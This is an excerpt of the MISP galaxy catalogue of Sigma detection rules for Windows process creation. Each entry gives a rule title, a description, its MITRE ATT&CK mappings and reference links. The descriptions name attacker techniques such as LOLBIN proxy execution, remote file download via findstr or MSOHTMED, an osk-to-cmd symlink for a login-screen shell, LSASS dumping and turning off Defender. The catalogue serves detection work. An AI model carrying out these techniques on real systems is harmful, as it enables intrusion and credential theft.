Explorer Process Tree Break has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 11042. Table References

Links

https://twitter.com/bohops/status/1276357235954909188?s=12

https://twitter.com/CyberRaiju/status/1273597319322058752

https://twitter.com/nas_bench/status/1535322450858233858

https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_break_process_tree.yml

Proxy Execution Via Explorer.exe

Attackers can use explorer.exe for evading defense mechanisms

The tag is: misp-galaxy:sigma-rules="Proxy Execution Via Explorer.exe"

Proxy Execution Via Explorer.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11043. Table References

Links

https://twitter.com/CyberRaiju/status/1273597319322058752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_explorer_lolbin_execution.yml

Netsh Allow Group Policy on Microsoft Defender Firewall

Adversaries may modify system firewalls in order to bypass controls limiting network usage

The tag is: misp-galaxy:sigma-rules="Netsh Allow Group Policy on Microsoft Defender Firewall"

Netsh Allow Group Policy on Microsoft Defender Firewall has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"

Table 11044. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall

https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml

Renamed Gpg.EXE Execution

Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.

The tag is: misp-galaxy:sigma-rules="Renamed Gpg.EXE Execution"

Renamed Gpg.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 11045. Table References

Links

https://securelist.com/locked-out/68960/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_gpg4win.yml

Files And Subdirectories Listing Using Dir

Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories

The tag is: misp-galaxy:sigma-rules="Files And Subdirectories Listing Using Dir"

Files And Subdirectories Listing Using Dir has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 11046. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml

Pubprn.vbs Proxy Execution

Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.

The tag is: misp-galaxy:sigma-rules="Pubprn.vbs Proxy Execution"

Pubprn.vbs Proxy Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PubPrn - T1216.001" with estimative-language:likelihood-probability="almost-certain"

Table 11047. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/Pubprn/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell

Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.

The tag is: misp-galaxy:sigma-rules="Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell"

Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11048. Table References

Links

https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml

Abusing Print Executable

Attackers can use print.exe for remote file copy

The tag is: misp-galaxy:sigma-rules="Abusing Print Executable"

Abusing Print Executable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11049. Table References

Links

https://twitter.com/Oddvarmoe/status/985518877076541440

https://lolbas-project.github.io/lolbas/Binaries/Print/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml

Suspicious WindowsTerminal Child Processes

Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)

The tag is: misp-galaxy:sigma-rules="Suspicious WindowsTerminal Child Processes"

Table 11050. Table References

Links

https://persistence-info.github.io/Data/windowsterminalprofile.html

https://twitter.com/nas_bench/status/1550836225652686848

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml

HackTool - Bloodhound/Sharphound Execution

Detects command line parameters used by Bloodhound and Sharphound hack tools

The tag is: misp-galaxy:sigma-rules="HackTool - Bloodhound/Sharphound Execution"

HackTool - Bloodhound/Sharphound Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11051. Table References

Links

https://github.com/BloodHoundAD/SharpHound

https://github.com/BloodHoundAD/BloodHound

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_bloodhound_sharphound.yml

Uncommon Extension Shim Database Installation Via Sdbinst.EXE

Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

The tag is: misp-galaxy:sigma-rules="Uncommon Extension Shim Database Installation Via Sdbinst.EXE"

Uncommon Extension Shim Database Installation Via Sdbinst.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 11052. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/nasbench/Misc-Research/blob/8ee690e43a379cbce8c9d61107442c36bd9be3d3/Other/Undocumented-Flags-Sdbinst.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_susp_extension.yml

Lolbin Unregmp2.exe Use As Proxy

Detect usage of the "unregmp2.exe" binary as a proxy to launch a custom version of "wmpnscfg.exe"

The tag is: misp-galaxy:sigma-rules="Lolbin Unregmp2.exe Use As Proxy"

Lolbin Unregmp2.exe Use As Proxy has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11053. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml

CMD Shell Output Redirect

Detects the use of the redirection character ">" to redicrect information in commandline

The tag is: misp-galaxy:sigma-rules="CMD Shell Output Redirect"

CMD Shell Output Redirect has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11055. Table References

Links

https://ss64.com/nt/syntax-redirection.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_redirect.yml

Procdump Execution

Detects usage of the SysInternals Procdump utility

The tag is: misp-galaxy:sigma-rules="Procdump Execution"

Procdump Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 11056. Table References

Links

https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml

LSA PPL Protection Disabled Via Reg.EXE

Detects the usage of the "reg.exe" utility to disable PPL protection on the LSA process

The tag is: misp-galaxy:sigma-rules="LSA PPL Protection Disabled Via Reg.EXE"

LSA PPL Protection Disabled Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Downgrade Attack - T1562.010" with estimative-language:likelihood-probability="almost-certain"

Table 11057. Table References

Links

https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_ppl_protection_disabled.yml

PowerShell Download Pattern

Detects a Powershell process that contains download commands in its command line string

The tag is: misp-galaxy:sigma-rules="PowerShell Download Pattern"

PowerShell Download Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11058. Table References

Links

https://hatching.io/blog/powershell-analysis/

https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html

https://lab52.io/blog/winter-vivern-all-summer/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_patterns.yml

Arbitrary File Download Via MSOHTMED.EXE

Detects usage of "MSOHTMED" to download arbitrary files

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via MSOHTMED.EXE"

Arbitrary File Download Via MSOHTMED.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11059. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/238/files

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msohtmed_download.yml

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI

Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

The tag is: misp-galaxy:sigma-rules="IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI"

Table 11060. Table References

Links

https://twitter.com/M_haggis/status/1699056847154725107

https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content

https://twitter.com/JAMESWT_MHT/status/1699042827261391247

https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml

Potential WinAPI Calls Via CommandLine

Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec

The tag is: misp-galaxy:sigma-rules="Potential WinAPI Calls Via CommandLine"

Potential WinAPI Calls Via CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

Table 11061. Table References

Links

https://twitter.com/m417z/status/1566674631788007425

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_win_api_access.yml

Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in.

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation Using Symlink Between Osk and Cmd"

Potential Privilege Escalation Using Symlink Between Osk and Cmd has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 11062. Table References

Links

https://ss64.com/nt/mklink.html

https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml

Local Groups Reconnaissance Via Wmic.EXE

Detects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Local Groups Reconnaissance Via Wmic.EXE"

Local Groups Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 11063. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_group.yml

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet

Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet

The tag is: misp-galaxy:sigma-rules="Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet"

Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

Table 11064. Table References

Links

https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml

Uncommon System Information Discovery Via Wmic.EXE

Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.

The tag is: misp-galaxy:sigma-rules="Uncommon System Information Discovery Via Wmic.EXE"

Uncommon System Information Discovery Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 11065. Table References

Links

https://www.virustotal.com/gui/file/d6f6bc10ae0e634ed4301d584f61418cee18e5d58ad9af72f8aa552dc4aaeca3/behavior

https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar

https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/

https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/

https://nwgat.ninja/getting-system-information-with-wmic-on-windows/

https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml

Remote File Download Via Findstr.EXE

Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.

The tag is: misp-galaxy:sigma-rules="Remote File Download Via Findstr.EXE"

Remote File Download Via Findstr.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11066. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_download.yml

Java Running with Remote Debugging

Detects a JAVA process running with remote debugging allowing more than just localhost to connect

The tag is: misp-galaxy:sigma-rules="Java Running with Remote Debugging"

Java Running with Remote Debugging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 11067. Table References

Links

https://dzone.com/articles/remote-debugging-java-applications-with-jdwp

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_remote_debugging.yml

Python Spawning Pretty TTY on Windows

Detects python spawning a pretty tty

The tag is: misp-galaxy:sigma-rules="Python Spawning Pretty TTY on Windows"

Python Spawning Pretty TTY on Windows has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11068. Table References

Links

https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_python_pty_spawn.yml

Replace.exe Usage

Detects the use of Replace.exe which can be used to replace file with another file

The tag is: misp-galaxy:sigma-rules="Replace.exe Usage"

Replace.exe Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 11069. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/replace

https://lolbas-project.github.io/lolbas/Binaries/Replace/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_replace.yml

Disabled IE Security Features

Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features

The tag is: misp-galaxy:sigma-rules="Disabled IE Security Features"

Disabled IE Security Features has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11070. Table References

Links

https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml

Process Proxy Execution Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

The tag is: misp-galaxy:sigma-rules="Process Proxy Execution Via Squirrel.EXE"

Process Proxy Execution Via Squirrel.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11071. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/

http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_proxy_execution.yml

Indirect Command Execution By Program Compatibility Wizard

Detect indirect command execution via Program Compatibility Assistant pcwrun.exe

The tag is: misp-galaxy:sigma-rules="Indirect Command Execution By Program Compatibility Wizard"

Indirect Command Execution By Program Compatibility Wizard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11072. Table References

Links

https://twitter.com/pabraeken/status/991335019833708544

https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml

Tap Installer Execution

Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques

The tag is: misp-galaxy:sigma-rules="Tap Installer Execution"

Tap Installer Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"

Table 11073. Table References

Links

https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml

Suspicious IIS Module Registration

Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors

The tag is: misp-galaxy:sigma-rules="Suspicious IIS Module Registration"

Suspicious IIS Module Registration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004" with estimative-language:likelihood-probability="almost-certain"

Table 11074. Table References

Links

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_susp_module_registration.yml

LOL-Binary Copied From System Directory

Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.

The tag is: misp-galaxy:sigma-rules="LOL-Binary Copied From System Directory"

LOL-Binary Copied From System Directory has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 11075. Table References

Links

https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120

https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/

https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml

Potentially Suspicious Desktop Background Change Using Reg.EXE

Detects the execution of "reg.exe" to alter registry keys that would replace the user’s desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Desktop Background Change Using Reg.EXE"

Potentially Suspicious Desktop Background Change Using Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 11076. Table References

Links

https://www.attackiq.com/2023/09/20/emulating-rhysida/

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper

https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_desktop_background_change.yml

Powershell Base64 Encoded MpPreference Cmdlet

Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV

The tag is: misp-galaxy:sigma-rules="Powershell Base64 Encoded MpPreference Cmdlet"

Powershell Base64 Encoded MpPreference Cmdlet has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 11077. Table References

Links

https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://twitter.com/AdamTheAnalyst/status/1483497517119590403

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_mppreference.yml

Parent in Public Folder Suspicious Process

This rule detects suspicious processes with parent images located in the C:\Users\Public folder

The tag is: misp-galaxy:sigma-rules="Parent in Public Folder Suspicious Process"

Parent in Public Folder Suspicious Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 11078. Table References

Links

https://redcanary.com/blog/blackbyte-ransomware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_from_public_folder_as_parent.yml

New Service Creation Using PowerShell

Detects the creation of a new service using powershell.

The tag is: misp-galaxy:sigma-rules="New Service Creation Using PowerShell"

New Service Creation Using PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 11079. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_create_service.yml

OpenWith.exe Executes Specified Binary

The OpenWith.exe executes other binary

The tag is: misp-galaxy:sigma-rules="OpenWith.exe Executes Specified Binary"

OpenWith.exe Executes Specified Binary has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 11080. Table References

Links

https://twitter.com/harr0ey/status/991670870384021504

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Openwith.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openwith.yml

Scheduled Task Executing Encoded Payload from Registry

Detects the creation of a schtask that potentially executes a base64 encoded payload stored in the Windows Registry using PowerShell.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executing Encoded Payload from Registry"

Scheduled Task Executing Encoded Payload from Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 11081. Table References

Links

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_reg_loader_encoded.yml

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call

Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly"

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call"

Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 11082. Table References

Links

https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml

Suspicious Schtasks From Env Var Folder

Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware

The tag is: misp-galaxy:sigma-rules="Suspicious Schtasks From Env Var Folder"

Suspicious Schtasks From Env Var Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 11083. Table References

Links

https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/

https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml

Potential File Overwrite Via Sysinternals SDelete

Detects the use of SDelete to erase a file not the free space

The tag is: misp-galaxy:sigma-rules="Potential File Overwrite Via Sysinternals SDelete"

Potential File Overwrite Via Sysinternals SDelete has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 11084. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sdelete.yml

Potential LethalHTA Technique Execution

Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process

The tag is: misp-galaxy:sigma-rules="Potential LethalHTA Technique Execution"

